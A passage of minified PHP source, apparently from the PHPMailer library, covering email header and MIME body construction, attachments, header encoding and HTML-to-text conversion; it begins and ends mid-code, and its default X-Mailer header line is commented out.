- 2, 1)) { $len -= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); $buf .= " " . $part; $message .= $buf . sprintf("=%s", static::$LE); } else { $message .= $buf . $soft_break; } $buf = ""; } while ($word !== "") { if ($length <= 0) { break; } $len = $length; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len); } elseif ("=" === substr($word, $len - 1, 1)) {--$len;} elseif ("=" === substr($word, $len - 2, 1)) { $len -= 2; } $part = substr($word, 0, $len); $word = (string) substr($word, $len); if ($word !== "") { $message .= $part . sprintf("=%s", static::$LE); } else { $buf = $part; } } } else { $buf_o = $buf; if (!$firstword) { $buf .= " "; } $buf .= $word; if ("" !== $buf_o && strlen($buf) > $length) { $message .= $buf_o . $soft_break; $buf = $word; } } $firstword = false; } $message .= $buf . static::$LE; } return $message; } public function utf8CharBoundary($encodedText, $maxLength) { $foundSplitPos = false; $lookBack = 3; while (!$foundSplitPos) { $lastChunk = substr( $encodedText, $maxLength - $lookBack, $lookBack ); $encodedCharPos = strpos($lastChunk, "="); if (false !== $encodedCharPos) { $hex = substr( $encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2 ); $dec = hexdec($hex); if ($dec < 128) { if ($encodedCharPos > 0) { $maxLength -= $lookBack - $encodedCharPos; } $foundSplitPos = true; } elseif ($dec >= 192) { $maxLength -= $lookBack - $encodedCharPos; $foundSplitPos = true; } elseif ($dec < 192) { $lookBack += 3; } } else { $foundSplitPos = true; } } return $maxLength; } public function setWordWrap() { if ($this->WordWrap < 1) { return; } switch ($this->message_type) { case "alt": case "alt_inline": case "alt_attach": case "alt_inline_attach": $this->AltBody = $this->wrapText( $this->AltBody, $this->WordWrap ); break; default: $this->Body = $this->wrapText($this->Body, $this->WordWrap); break; } } public function createHeader() { $result = ""; $result .= $this->headerLine( "Date", "" === $this->MessageDate ? self::rfcDate() : $this->MessageDate ); if ("mail" !== $this->Mailer) { if ($this->SingleTo) { foreach ($this->to as $toaddr) { $this->SingleToArray[] = $this->addrFormat($toaddr); } } elseif (count($this->to) > 0) { $result .= $this->addrAppend("To", $this->to); } elseif (count($this->cc) === 0) { $result .= $this->headerLine("To", "undisclosed-recipients:;"); } } $result .= $this->addrAppend("From", [ [trim($this->From), $this->FromName], ]); if (count($this->cc) > 0) { $result .= $this->addrAppend("Cc", $this->cc); } if ( ("sendmail" === $this->Mailer || "qmail" === $this->Mailer || "mail" === $this->Mailer) && count($this->bcc) > 0 ) { $result .= $this->addrAppend("Bcc", $this->bcc); } if (count($this->ReplyTo) > 0) { $result .= $this->addrAppend("Reply-To", $this->ReplyTo); } if ("mail" !== $this->Mailer) { $result .= $this->headerLine( "Subject", $this->encodeHeader($this->secureHeader($this->Subject)) ); } if ( "" !== $this->MessageID && preg_match( '/^<((([a-z\d!#$%&\'*+\/=?^_`{|}~-]+(\.[a-z\d!#$%&\'*+\/=?^_`{|}~-]+)*)' . '|("(([\x01-\x08\x0B\x0C\x0E-\x1F\x7F]|[\x21\x23-\x5B\x5D-\x7E])' . '|(\\[\x01-\x09\x0B\x0C\x0E-\x7F]))*"))@(([a-z\d!#$%&\'*+\/=?^_`{|}~-]+' . '(\.[a-z\d!#$%&\'*+\/=?^_`{|}~-]+)*)|(\[(([\x01-\x08\x0B\x0C\x0E-\x1F\x7F]' . '|[\x21-\x5A\x5E-\x7E])|(\\[\x01-\x09\x0B\x0C\x0E-\x7F]))*\])))>$/Di', $this->MessageID ) ) { $this->lastMessageID = $this->MessageID; } else { $this->lastMessageID = sprintf( "<%s@%s>", $this->uniqueid, $this->serverHostname() ); } $result .= $this->headerLine("Message-ID", $this->lastMessageID); if (null !== $this->Priority) { $result .= $this->headerLine("X-Priority", $this->Priority); } if ("" === $this->XMailer) { /* $result .= $this->headerLine( "X-Mailer", "PHPMailer " . self::VERSION . " (" ); */ } elseif (is_string($this->XMailer) && trim($this->XMailer) !== "") { $result .= $this->headerLine("X-Mailer", trim($this->XMailer)); } if ("" !== $this->ConfirmReadingTo) { $result .= $this->headerLine( "Disposition-Notification-To", "<" . $this->ConfirmReadingTo . ">" ); } foreach ($this->CustomHeader as $header) { $result .= $this->headerLine( trim($header[0]), $this->encodeHeader(trim($header[1])) ); } if (!$this->sign_key_file) { $result .= $this->headerLine("MIME-Version", "1.0"); $result .= $this->getMailMIME(); } return $result; } public function getMailMIME() { $result = ""; $ismultipart = true; switch ($this->message_type) { case "inline": $result .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_RELATED . ";" ); $result .= $this->textLine( ' boundary="' . $this->boundary[1] . '"' ); break; case "attach": case "inline_attach": case "alt_attach": case "alt_inline_attach": $result .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_MIXED . ";" ); $result .= $this->textLine( ' boundary="' . $this->boundary[1] . '"' ); break; case "alt": case "alt_inline": $result .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_ALTERNATIVE . ";" ); $result .= $this->textLine( ' boundary="' . $this->boundary[1] . '"' ); break; default: $result .= $this->textLine( "Content-Type: " . $this->ContentType . "; charset=" . $this->CharSet ); $ismultipart = false; break; } if (static::ENCODING_7BIT !== $this->Encoding) { if ($ismultipart) { if (static::ENCODING_8BIT === $this->Encoding) { $result .= $this->headerLine("Content-Transfer-Encoding",static::ENCODING_8BIT );} } else { $result .= $this->headerLine( "Content-Transfer-Encoding", $this->Encoding ); } } return $result; } public function getSentMIMEMessage() { return static::stripTrailingWSP($this->MIMEHeader . $this->mailHeader) . static::$LE . static::$LE . $this->MIMEBody; } protected function generateId() { $len = 32; $bytes = ""; if (function_exists("random_bytes")) { try { $bytes = random_bytes($len); } catch (\Exception $e) { } } elseif (function_exists("openssl_random_pseudo_bytes")) { $bytes = openssl_random_pseudo_bytes($len); } if ($bytes === "") { $bytes = hash("sha256", uniqid((string) mt_rand(), true), true); } return str_replace( ["=", "+", "/"], "", base64_encode(hash("sha256", $bytes, true)) ); } public function createBody() { $body = ""; $this->setBoundaries(); if ($this->sign_key_file) { $body .= $this->getMailMIME() . static::$LE; } $this->setWordWrap(); $bodyEncoding = $this->Encoding; $bodyCharSet = $this->CharSet; if ( static::ENCODING_8BIT === $bodyEncoding && !$this->has8bitChars($this->Body) ) { $bodyEncoding = static::ENCODING_7BIT; $bodyCharSet = static::CHARSET_ASCII; } if ( static::ENCODING_BASE64 !== $this->Encoding && static::hasLineLongerThanMax($this->Body) ) { $bodyEncoding = static::ENCODING_QUOTED_PRINTABLE; } $altBodyEncoding = $this->Encoding; $altBodyCharSet = $this->CharSet; if ( static::ENCODING_8BIT === $altBodyEncoding && !$this->has8bitChars($this->AltBody) ) { $altBodyEncoding = static::ENCODING_7BIT; $altBodyCharSet = static::CHARSET_ASCII; } if ( static::ENCODING_BASE64 !== $altBodyEncoding && static::hasLineLongerThanMax($this->AltBody) ) { $altBodyEncoding = static::ENCODING_QUOTED_PRINTABLE; } $mimepre = ""; switch ($this->message_type) { case "inline": $body .= $mimepre; $body .= $this->getBoundary( $this->boundary[1], $bodyCharSet, "", $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll("inline", $this->boundary[1]); break; case "attach": $body .= $mimepre; $body .= $this->getBoundary( $this->boundary[1], $bodyCharSet, "", $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll("attachment", $this->boundary[1]); break; case "inline_attach": $body .= $mimepre; $body .= $this->textLine("--" . $this->boundary[1]); $body .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_RELATED . ";" ); $body .= $this->textLine( ' boundary="' . $this->boundary[2] . '";' ); $body .= $this->textLine( ' type="' . static::CONTENT_TYPE_TEXT_HTML . '"' ); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $bodyCharSet, "", $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll("inline", $this->boundary[2]); $body .= static::$LE; $body .= $this->attachAll("attachment", $this->boundary[1]); break; case "alt": $body .= $mimepre; $body .= $this->getBoundary( $this->boundary[1], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[1], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; if (!empty($this->Ical)) { $method = static::ICAL_METHOD_REQUEST; foreach (static::$IcalMethods as $imethod) { if ( stripos($this->Ical, "METHOD:" . $imethod) !== false ) { $method = $imethod; break; } } $body .= $this->getBoundary( $this->boundary[1], "", static::CONTENT_TYPE_TEXT_CALENDAR . "; method=" . $method, "" ); $body .= $this->encodeString($this->Ical, $this->Encoding); $body .= static::$LE; } $body .= $this->endBoundary($this->boundary[1]); break; case "alt_inline": $body .= $mimepre; $body .= $this->getBoundary( $this->boundary[1], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->textLine("--" . $this->boundary[1]); $body .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_RELATED . ";" ); $body .= $this->textLine( ' boundary="' . $this->boundary[2] . '";' ); $body .= $this->textLine( ' type="' . static::CONTENT_TYPE_TEXT_HTML . '"' ); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll("inline", $this->boundary[2]); $body .= static::$LE; $body .= $this->endBoundary($this->boundary[1]); break; case "alt_attach": $body .= $mimepre; $body .= $this->textLine("--" . $this->boundary[1]); $body .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_ALTERNATIVE . ";" );$body .= $this->textLine( ' boundary="' . $this->boundary[2] . '"' );$body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; if (!empty($this->Ical)) { $method = static::ICAL_METHOD_REQUEST; foreach (static::$IcalMethods as $imethod) { if ( stripos($this->Ical, "METHOD:" . $imethod) !== false ) { $method = $imethod; break; } } $body .= $this->getBoundary( $this->boundary[2], "", static::CONTENT_TYPE_TEXT_CALENDAR . "; method=" . $method, "" ); $body .= $this->encodeString($this->Ical, $this->Encoding); } $body .= $this->endBoundary($this->boundary[2]); $body .= static::$LE; $body .= $this->attachAll("attachment", $this->boundary[1]); break; case "alt_inline_attach": $body .= $mimepre; $body .= $this->textLine("--" . $this->boundary[1]); $body .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_ALTERNATIVE . ";" ); $body .= $this->textLine( ' boundary="' . $this->boundary[2] . '"' ); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[2], $altBodyCharSet, static::CONTENT_TYPE_PLAINTEXT, $altBodyEncoding ); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= static::$LE; $body .= $this->textLine("--" . $this->boundary[2]); $body .= $this->headerLine( "Content-Type", static::CONTENT_TYPE_MULTIPART_RELATED . ";" ); $body .= $this->textLine( ' boundary="' . $this->boundary[3] . '";' ); $body .= $this->textLine( ' type="' . static::CONTENT_TYPE_TEXT_HTML . '"' ); $body .= static::$LE; $body .= $this->getBoundary( $this->boundary[3], $bodyCharSet, static::CONTENT_TYPE_TEXT_HTML, $bodyEncoding ); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= static::$LE; $body .= $this->attachAll("inline", $this->boundary[3]); $body .= static::$LE; $body .= $this->endBoundary($this->boundary[2]); $body .= static::$LE; $body .= $this->attachAll("attachment", $this->boundary[1]); break; default: $this->Encoding = $bodyEncoding; $body .= $this->encodeString($this->Body, $this->Encoding); break; } if ($this->isError()) { $body = ""; if ($this->exceptions) { throw new Exception( $this->lang("empty_message"), self::STOP_CRITICAL ); } } elseif ($this->sign_key_file) { try { if (!defined("PKCS7_TEXT")) { throw new Exception( $this->lang("extension_missing") . "openssl" ); } $file = tempnam(sys_get_temp_dir(), "srcsign"); $signed = tempnam(sys_get_temp_dir(), "mailsign"); file_put_contents($file, $body); if (empty($this->sign_extracerts_file)) { $sign = @openssl_pkcs7_sign( $file, $signed, "file://" . realpath($this->sign_cert_file), [ "file://" . realpath($this->sign_key_file), $this->sign_key_pass, ], [] ); } else { $sign = @openssl_pkcs7_sign( $file, $signed, "file://" . realpath($this->sign_cert_file), [ "file://" . realpath($this->sign_key_file), $this->sign_key_pass, ], [], PKCS7_DETACHED, $this->sign_extracerts_file ); } @unlink($file); if ($sign) { $body = file_get_contents($signed); @unlink($signed); $parts = explode("\n\n", $body, 2); $this->MIMEHeader .= $parts[0] . static::$LE . static::$LE; $body = $parts[1]; } else { @unlink($signed); throw new Exception( $this->lang("signing") . openssl_error_string() ); } } catch (Exception $exc) { $body = ""; if ($this->exceptions) { throw $exc; } } } return $body; } public function getBoundaries() { if (empty($this->boundary)) { $this->setBoundaries(); } return $this->boundary; } protected function getBoundary($boundary, $charSet, $contentType, $encoding) { $result = ""; if ("" === $charSet) { $charSet = $this->CharSet; } if ("" === $contentType) { $contentType = $this->ContentType; } if ("" === $encoding) { $encoding = $this->Encoding; } $result .= $this->textLine("--" . $boundary); $result .= sprintf( "Content-Type: %s; charset=%s", $contentType, $charSet ); $result .= static::$LE; if (static::ENCODING_7BIT !== $encoding) { $result .= $this->headerLine( "Content-Transfer-Encoding", $encoding ); } $result .= static::$LE; return $result; } protected function endBoundary($boundary) { return static::$LE . "--" . $boundary . "--" . static::$LE; } protected function setMessageType() { $type = []; if ($this->alternativeExists()) { $type[] = "alt"; } if ($this->inlineImageExists()) { $type[] = "inline"; } if ($this->attachmentExists()) { $type[] = "attach"; } $this->message_type = implode("_", $type); if ("" === $this->message_type) { $this->message_type = "plain"; } } public function headerLine($name, $value) { return $name . ": " . $value . static::$LE; } public function textLine($value) { return $value. static::$LE; } public function addAttachment( $path, $name = "", $encoding = self::ENCODING_BASE64,$type = "", $disposition = "attachment" ) { try { if (!static::fileIsAccessible($path)) { throw new Exception( $this->lang("file_access") . $path, self::STOP_CONTINUE ); } if ("" === $type) { $type = static::filenameToType($path); } $filename = (string) static::mb_pathinfo($path, PATHINFO_BASENAME); if ("" === $name) { $name = $filename; } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang("encoding") . $encoding); } $this->attachment[] = [ 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => $disposition, 7 => $name, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } public function getAttachments() { return $this->attachment; } protected function attachAll($disposition_type, $boundary) { $mime = []; $cidUniq = []; $incl = []; foreach ($this->attachment as $attachment) { if ($attachment[6] === $disposition_type) { $string = ""; $path = ""; $bString = $attachment[5]; if ($bString) { $string = $attachment[0]; } else { $path = $attachment[0]; } $inclhash = hash("sha256", serialize($attachment)); if (in_array($inclhash, $incl, true)) { continue; } $incl[] = $inclhash; $name = $attachment[2]; $encoding = $attachment[3]; $type = $attachment[4]; $disposition = $attachment[6]; $cid = $attachment[7]; if ( "inline" === $disposition && array_key_exists($cid, $cidUniq) ) { continue; } $cidUniq[$cid] = true; $mime[] = sprintf("--%s%s", $boundary, static::$LE); if (!empty($name)) { $mime[] = sprintf( "Content-Type: %s; name=%s%s", $type, static::quotedString( $this->encodeHeader($this->secureHeader($name)) ), static::$LE ); } else { $mime[] = sprintf("Content-Type: %s%s", $type, static::$LE); } if (static::ENCODING_7BIT !== $encoding) { $mime[] = sprintf( "Content-Transfer-Encoding: %s%s", $encoding, static::$LE ); } if ((string) $cid !== "" && $disposition === "inline") { $mime[] = "Content-ID: <" . $this->encodeHeader($this->secureHeader($cid)) . ">" . static::$LE; } if (!empty($disposition)) { $encoded_name = $this->encodeHeader( $this->secureHeader($name) ); if (!empty($encoded_name)) { $mime[] = sprintf( "Content-Disposition: %s; filename=%s%s", $disposition, static::quotedString($encoded_name), static::$LE . static::$LE ); } else { $mime[] = sprintf( "Content-Disposition: %s%s", $disposition, static::$LE . static::$LE ); } } else { $mime[] = static::$LE; } if ($bString) { $mime[] = $this->encodeString($string, $encoding); } else { $mime[] = $this->encodeFile($path, $encoding); } if ($this->isError()) { return ""; } $mime[] = static::$LE; } } $mime[] = sprintf("--%s--%s", $boundary, static::$LE); return implode("", $mime); } protected function encodeFile($path, $encoding = self::ENCODING_BASE64) { try { if (!static::fileIsAccessible($path)) { throw new Exception( $this->lang("file_open") . $path, self::STOP_CONTINUE ); } $file_buffer = file_get_contents($path); if (false === $file_buffer) { throw new Exception( $this->lang("file_open") . $path, self::STOP_CONTINUE ); } $file_buffer = $this->encodeString($file_buffer, $encoding); return $file_buffer; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return ""; } } public function encodeString($str, $encoding = self::ENCODING_BASE64) { $encoded = ""; switch (strtolower($encoding)) { case static::ENCODING_BASE64: $encoded = chunk_split( base64_encode($str), static::STD_LINE_LENGTH, static::$LE ); break; case static::ENCODING_7BIT: case static::ENCODING_8BIT: $encoded = static::normalizeBreaks($str); if (substr($encoded, -strlen(static::$LE)) !== static::$LE) { $encoded .= static::$LE; } break; case static::ENCODING_BINARY: $encoded = $str; break; case static::ENCODING_QUOTED_PRINTABLE: $encoded = $this->encodeQP($str); break; default: $this->setError($this->lang("encoding") . $encoding); if ($this->exceptions) { throw new Exception($this->lang("encoding") . $encoding); } break; } return $encoded; } public function encodeHeader($str, $position = "text") { $matchcount = 0; switch (strtolower($position)) { case "phrase": if (!preg_match('/[\200-\377]/', $str)) { $encoded = addcslashes($str, "\0..\37\177\\\""); if ( $str === $encoded && !preg_match( '/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str ) ) { return $encoded; } return "\"$encoded\""; } $matchcount = preg_match_all( '/[^\040\041\043-\133\135-\176]/', $str, $matches );break; case "comment": $matchcount = preg_match_all('/[()"]/', $str,$matches); case "text":default: $matchcount += preg_match_all( '/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches ); break; } if ($this->has8bitChars($str)) { $charset = $this->CharSet; } else { $charset = static::CHARSET_ASCII; } $overhead = 8 + strlen($charset); if ("mail" === $this->Mailer) { $maxlen = static::MAIL_MAX_LINE_LENGTH - $overhead; } else { $maxlen = static::MAX_LINE_LENGTH - $overhead; } if ($matchcount > strlen($str) / 3) { $encoding = "B"; } elseif ($matchcount > 0) { $encoding = "Q"; } elseif (strlen($str) > $maxlen) { $encoding = "Q"; } else { $encoding = false; } switch ($encoding) { case "B": if ($this->hasMultiBytes($str)) { $encoded = $this->base64EncodeWrapMB($str, "\n"); } else { $encoded = base64_encode($str); $maxlen -= $maxlen % 4; $encoded = trim(chunk_split($encoded, $maxlen, "\n")); } $encoded = preg_replace( '/^(.*)$/m', " =?" . $charset . "?$encoding?\\1?=", $encoded ); break; case "Q": $encoded = $this->encodeQ($str, $position); $encoded = $this->wrapText($encoded, $maxlen, true); $encoded = str_replace("=" . static::$LE, "\n", trim($encoded)); $encoded = preg_replace( '/^(.*)$/m', " =?" . $charset . "?$encoding?\\1?=", $encoded ); break; default: return $str; } return trim(static::normalizeBreaks($encoded)); } public function hasMultiBytes($str) { if (function_exists("mb_strlen")) { return strlen($str) > mb_strlen($str, $this->CharSet); } return false; } public function has8bitChars($text) { return (bool) preg_match('/[\x80-\xFF]/', $text); } public function base64EncodeWrapMB($str, $linebreak = null) { $start = "=?" . $this->CharSet . "?B?"; $end = "?="; $encoded = ""; if (null === $linebreak) { $linebreak = static::$LE; } $mb_length = mb_strlen($str, $this->CharSet); $length = 75 - strlen($start) - strlen($end); $ratio = $mb_length / strlen($str); $avgLength = floor($length * $ratio * 0.75); $offset = 0; for ($i = 0; $i < $mb_length; $i += $offset) { $lookBack = 0; do { $offset = $avgLength - $lookBack; $chunk = mb_substr($str, $i, $offset, $this->CharSet); $chunk = base64_encode($chunk); ++$lookBack; } while (strlen($chunk) > $length); $encoded .= $chunk . $linebreak; } return substr($encoded, 0, -strlen($linebreak)); } public function encodeQP($string) { return static::normalizeBreaks(quoted_printable_encode($string)); } public function encodeQ($str, $position = "text") { $pattern = ""; $encoded = str_replace(["\r", "\n"], "", $str); switch (strtolower($position)) { case "phrase": $pattern = "^A-Za-z0-9!*+\/ -"; break; case "comment": $pattern = '\(\)"'; case "text": default: $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern; break; } $matches = []; if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) { $eqkey = array_search("=", $matches[0], true); if (false !== $eqkey) { unset($matches[0][$eqkey]); array_unshift($matches[0], "="); } foreach (array_unique($matches[0]) as $char) { $encoded = str_replace( $char, "=" . sprintf("%02X", ord($char)), $encoded ); } } return str_replace(" ", "_", $encoded); } public function addStringAttachment( $string, $filename, $encoding = self::ENCODING_BASE64, $type = "", $disposition = "attachment" ) { try { if ("" === $type) { $type = static::filenameToType($filename); } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang("encoding") . $encoding); } $this->attachment[] = [ 0 => $string, 1 => $filename, 2 => static::mb_pathinfo($filename, PATHINFO_BASENAME), 3 => $encoding, 4 => $type, 5 => true, 6 => $disposition, 7 => 0, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } public function addEmbeddedImage( $path, $cid, $name = "", $encoding = self::ENCODING_BASE64, $type = "", $disposition = "inline" ) { try { if (!static::fileIsAccessible($path)) { throw new Exception( $this->lang("file_access") . $path, self::STOP_CONTINUE ); } if ("" === $type) { $type = static::filenameToType($path); } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang("encoding") . $encoding); } $filename = (string) static::mb_pathinfo($path, PATHINFO_BASENAME); if ("" === $name) { $name = $filename; } $this->attachment[] = [ 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, 6 => $disposition, 7 => $cid, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } public function addStringEmbeddedImage( $string, $cid, $name = "", $encoding = self::ENCODING_BASE64, $type = "", $disposition = "inline" ) { try { if ("" === $type && !empty($name)) { $type = static::filenameToType($name); } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang("encoding") . $encoding); } $this->attachment[] = [ 0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, 6 => $disposition, 7 => $cid, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } protected function validateEncoding($encoding) { return in_array( $encoding, [self::ENCODING_7BIT, self::ENCODING_QUOTED_PRINTABLE, self::ENCODING_BASE64, self::ENCODING_8BIT, self::ENCODING_BINARY, ], true ); } protected function cidExists($cid) { foreach ($this->attachment as $attachment) { if ("inline" === $attachment[6] && $cid === $attachment[7]) { return true; } } return false; } public function inlineImageExists() { foreach ($this->attachment as $attachment) { if ("inline" === $attachment[6]) { return true; } } return false; } public function attachmentExists() { foreach ($this->attachment as $attachment) { if ("attachment" === $attachment[6]) { return true; } } return false; } public function alternativeExists() { return !empty($this->AltBody); } public function clearQueuedAddresses($kind) { $this->RecipientsQueue = array_filter( $this->RecipientsQueue, static function ($params) use ($kind) { return $params[0] !== $kind; } ); } public function clearAddresses() { foreach ($this->to as $to) { unset($this->all_recipients[strtolower($to[0])]); } $this->to = []; $this->clearQueuedAddresses("to"); } public function clearCCs() { foreach ($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0])]); } $this->cc = []; $this->clearQueuedAddresses("cc"); } public function clearBCCs() { foreach ($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0])]); } $this->bcc = []; $this->clearQueuedAddresses("bcc"); } public function clearReplyTos() { $this->ReplyTo = []; $this->ReplyToQueue = []; } public function clearAllRecipients() { $this->to = []; $this->cc = []; $this->bcc = []; $this->all_recipients = []; $this->RecipientsQueue = []; } public function clearAttachments() { $this->attachment = []; } public function clearCustomHeaders() { $this->CustomHeader = []; } protected function setError($msg) { ++$this->error_count; if ("smtp" === $this->Mailer && null !== $this->smtp) { $lasterror = $this->smtp->getError(); if (!empty($lasterror["error"])) { $msg .= $this->lang("smtp_error") . $lasterror["error"]; if (!empty($lasterror["detail"])) { $msg .= " " . $this->lang("smtp_detail") . $lasterror["detail"]; } if (!empty($lasterror["smtp_code"])) { $msg .= " " . $this->lang("smtp_code") . $lasterror["smtp_code"]; } if (!empty($lasterror["smtp_code_ex"])) { $msg .= " " . $this->lang("smtp_code_ex") . $lasterror["smtp_code_ex"]; } } } $this->ErrorInfo = $msg; } public static function rfcDate() { date_default_timezone_set(@date_default_timezone_get()); return date("D, j M Y H:i:s O"); } protected function serverHostname() { $result = ""; if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif ( isset($_SERVER) && array_key_exists("SERVER_NAME", $_SERVER) ) { $result = $_SERVER["SERVER_NAME"]; } elseif (function_exists("gethostname") && gethostname() !== false) { $result = gethostname(); } elseif (php_uname("n") !== false) { $result = php_uname("n"); } if (!static::isValidHost($result)) { return "localhost.localdomain"; } return $result; } public static function isValidHost($host) { if ( empty($host) || !is_string($host) || strlen($host) > 256 || !preg_match('/^([a-zA-Z\d.-]*|\[[a-fA-F\d:]+\])$/', $host) ) { return false; } if ( strlen($host) > 2 && substr($host, 0, 1) === "[" && substr($host, -1, 1) === "]" ) { return filter_var( substr($host, 1, -1), FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) !== false; } if (is_numeric(str_replace(".", "", $host))) { return filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false; } return filter_var("http://" . $host, FILTER_VALIDATE_URL) !== false; } protected function lang($key) { if (count($this->language) < 1) { $this->setLanguage(); } if (array_key_exists($key, $this->language)) { if ("smtp_connect_failed" === $key) { return $this->language[$key] . ""; } return $this->language[$key]; } return $key; } private function getSmtpErrorMessage($base_key) { $message = $this->lang($base_key); $error = $this->smtp->getError(); if (!empty($error["error"])) { $message .= " " . $error["error"]; if (!empty($error["detail"])) { $message .= " " . $error["detail"]; } } return $message; } public function isError() { return $this->error_count > 0; } public function addCustomHeader($name, $value = null) { if (null === $value && strpos($name, ":") !== false) { list($name, $value) = explode(":", $name, 2); } $name = trim($name); $value = null === $value ? "" : trim($value); if (empty($name) || strpbrk($name . $value, "\r\n") !== false) { if ($this->exceptions) { throw new Exception($this->lang("invalid_header")); } return false; } $this->CustomHeader[] = [$name, $value]; return true; } public function getCustomHeaders() { return $this->CustomHeader; } public function msgHTML($message, $basedir = "", $advanced = false) { preg_match_all( '/(?<!-)(src|background)=["\'](.*)["\']/Ui', $message, $images ); if (array_key_exists(2, $images)) { if (strlen($basedir) > 1 && "/" !== substr($basedir, -1)) { $basedir .= "/"; } foreach ($images[2] as $imgindex => $url) { $match = []; if ( preg_match( "#^data:(image/(?:jpe?g|gif|png));?(base64)?,(.+)#", $url, $match ) ) { if ( count($match) === 4 && static::ENCODING_BASE64 === $match[2] ) { $data = base64_decode($match[3]); } elseif ("" === $match[2]) { $data = rawurldecode($match[3]); } else { continue; } $cid = substr(hash("sha256", $data), 0, 32) . "@phpmailer.0"; if (!$this->cidExists($cid)) { $this->addStringEmbeddedImage( $data, $cid,"embed" . $imgindex, static::ENCODING_BASE64,$match[1] ); } $message = str_replace( $images[0][$imgindex], $images[1][$imgindex] . '="cid:' . $cid . '"', $message ); continue; } if ( !empty($basedir) && strpos($url, "..") === false && 0 !== strpos($url, "cid:") && !preg_match("#^[a-z][a-z0-9+.-]*:?//#i", $url) ) { $filename = static::mb_pathinfo($url, PATHINFO_BASENAME); $directory = dirname($url); if ("." === $directory) { $directory = ""; } $cid = substr(hash("sha256", $url), 0, 32) . "@phpmailer.0"; if (strlen($basedir) > 1 && "/" !== substr($basedir, -1)) { $basedir .= "/"; } if ( strlen($directory) > 1 && "/" !== substr($directory, -1) ) { $directory .= "/"; } if ( $this->addEmbeddedImage( $basedir . $directory . $filename, $cid, $filename, static::ENCODING_BASE64, static::_mime_types( (string) static::mb_pathinfo( $filename, PATHINFO_EXTENSION ) ) ) ) { $message = preg_replace( "/" . $images[1][$imgindex] . '=["\']' . preg_quote($url, "/") . '["\']/Ui', $images[1][$imgindex] . '="cid:' . $cid . '"', $message ); } } } } $this->isHTML(); $this->Body = static::normalizeBreaks($message); $this->AltBody = static::normalizeBreaks( $this->html2text($message, $advanced) ); if (!$this->alternativeExists()) { $this->AltBody = "This is an HTML-only message. To view it, activate HTML in your email application." . static::$LE; } return $this->Body; } public function html2text($html, $advanced = false) { if (is_callable($advanced)) { return call_user_func($advanced, $html); } return html_entity_decode( trim( strip_tags( preg_replace( '/<(head|title|style|script)[^>]*>.*?<\/\\1>/si', "", $html ) ) ), ENT_QUOTES, $this->CharSet ); } public static function _mime_types($ext = "") { $mimes = [ "xl" => "application/excel", "js" => "application/javascript", "hqx" => "application/mac-binhex40", "cpt" => "application/mac-compactpro", "bin" => "application/macbinary", 